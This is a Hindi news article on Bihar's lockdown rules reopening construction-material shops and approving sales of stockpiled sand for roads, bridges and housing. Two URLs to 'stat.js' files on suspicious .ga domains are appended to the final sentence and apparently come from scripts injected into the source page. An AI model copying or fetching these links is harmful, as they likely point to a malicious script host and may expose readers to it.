#

बिहार में छड़, सीमेंट, गिट्टी और बालू की दुकानें खुलेंगी। लॉकडाउन के चलते निर्माण सामग्री की दुकानें बंद हैं। सरकार ने ग्रामीण क्षेत्रों में निर्माण कार्य को अनुमति दी है। इसके साथ ही सड़क और पुल भी बन रहे हैं, जिसके चलते निर्माण सामग्री की जरूरत है। इसके चलते गुरुवार को क्राइसिस मैनेजमेंट की बैठक में यह फैसला लिया गया। इलाकों में जरूरत के अनुसार दुकान खोलने का निर्णय जिले के डीएम लेंगे।

सरकार ने बालू की बिक्री को मंजूरी दी, निर्माण कार्यों में होगा उपयोग
राज्य सरकार ने बालू की बिक्री को मंजूरी दे दी है। निर्माण कार्यों में इनके उपयोग को हरी झंडी दी गयी है। लॉकडाउन के कारण सूबे में बालू की बिक्री बंद थी। राज्य सरकार द्वारा निर्माण कार्यों को मंजूरी देने के बाद बालू की आवश्यकता पड़ने लगी थी। ग्रामीण क्षेत्रों में सड़कों के निर्माण, प्रधानमंत्री आवास का निर्माण, पूरे प्रदेश में एनएच-एसएच सड़कों और पुल-पुलियों के निर्माण समेत कई अन्य कार्यों को राज्य सरकार ने स्वीकृति दी है। इसके अलावा गांवों में लघु सिंचाई योजनाओं पर भी काम शुरू है। इन सबके बाद बालू की जरूरत पड़ने लगी थी। लिहाजा खान एवं भूतत्व विभाग ने बालू की बिक्री को मंजूरी दे दी।

विभाग ने सभी निर्माण एजेंसियों से कहा है कि वे किसी भी अधिकृत स्टॉकिस्ट से बालू की खरीद कर सकते हैं। विभाग ने यह भी दावा किया कि स्टॉकिस्टों के पास बालू की कमी नहीं है। इस समय सभी स्टॉकिस्टों के पास 22 करोड़ सीएफटी से अधिक बालू की उपलब्धता है। इससे सूबे में निर्माण कार्यों को पूरा किया जा सकता है। हालांकि बालू का खनन शुरू नहीं किया गया है, जो उपलब्ध भंडारित बालू हैं उन्हीं का उपयोग करना है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms